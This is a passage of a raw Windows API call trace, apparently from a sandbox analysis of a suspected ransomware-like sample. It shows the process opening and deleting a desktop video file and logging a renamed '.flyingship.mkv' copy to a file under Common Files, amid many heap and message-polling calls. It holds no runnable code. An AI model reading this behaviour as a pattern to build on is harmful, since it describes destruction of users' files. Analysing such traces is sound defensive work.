[0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0168.457] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0168.457] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.457] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.458] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0168.458] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\y8qf6zl.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0168.460] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.460] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.460] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.460] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.460] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0168.460] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.460] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.462] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.462] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.462] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0168.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.462] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.462] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.464] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.464] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.464] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.464] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv", lpFilePart=0x0) returned 0x31 [0168.465] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8858920, ftCreationTime.dwHighDateTime=0x1d5dd7c, ftLastAccessTime.dwLowDateTime=0x52b3ff80, ftLastAccessTime.dwHighDateTime=0x1d5dff4, ftLastWriteTime.dwLowDateTime=0x9c4c7e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4db6, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Y8qF6zL.mkv", cAlternateFileName="")) returned 0x90ae18 [0168.465] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\y8qf6zl.mkv")) returned 1 [0168.468] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8858920, ftCreationTime.dwHighDateTime=0x1d5dd7c, ftLastAccessTime.dwLowDateTime=0x52b3ff80, ftLastAccessTime.dwHighDateTime=0x1d5dff4, ftLastWriteTime.dwLowDateTime=0x9c4c7e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4db6, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Y8qF6zL.mkv", cAlternateFileName="")) returned 0 [0168.468] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0168.470] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0168.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.470] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.470] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.471] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.471] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0168.471] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.471] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0168.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0168.472] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.472] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.472] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0168.472] ReadFile (in: hFile=0x138, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87f43c*=0xc77, lpOverlapped=0x0) returned 1 [0168.473] ReadFile (in: hFile=0x138, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0168.473] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xc77, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.473] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0168.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0168.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0168.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.flyingship.mkv\r\n", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0168.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3f) returned 0x8db138 [0168.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.flyingship.mkv\r\n", cchWideChar=63, lpMultiByteStr=0x8db138, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.flyingship.mkv\r\n", lpUsedDefaultChar=0x0) returned 63 [0168.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0168.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.473] WriteFile (in: hFile=0x138, lpBuffer=0x8db180*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8db180*, lpNumberOfBytesWritten=0x87f43c*=0x3e, lpOverlapped=0x0) returned 1 [0168.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0168.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0168.473] CloseHandle (hObject=0x138) returned 1 [0168.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0168.477] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0168.477] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0168.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0168.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0168.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0168.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0168.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0168.479] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0168.479] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.479] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0168.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0168.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0168.479] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0168.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0168.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0168.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1d30 [0168.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0168.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0168.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0168.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5b8 [0168.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0168.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0168.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0168.480] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0168.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0168.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0168.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0168.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0168.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0168.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0168.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) 